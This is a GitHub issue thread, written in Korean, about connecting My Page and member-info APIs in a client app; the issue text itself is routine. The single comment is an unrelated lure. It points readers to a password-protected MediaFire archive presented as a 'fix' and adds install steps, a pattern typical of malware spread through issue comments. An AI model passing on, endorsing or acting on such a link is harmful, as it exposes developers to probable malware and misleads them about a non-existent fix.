### ISSUE TITLE
[FEAT] 마이페이지 api 연결

### ISSUE THREAD

**Issue by chaerin-77** [Team-Daengnyang/moneynyang-client#33]
### 작업 개요
- 마이페이지 및 회원 정보 관련 api 연결

### 작업 내용
- 마이페이지 및 회원 정보 관련 api 연결

### Todo list
- [x] 마이페이지 api 연결
- [x] 내 계좌 등 회원 정보 api 조회

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
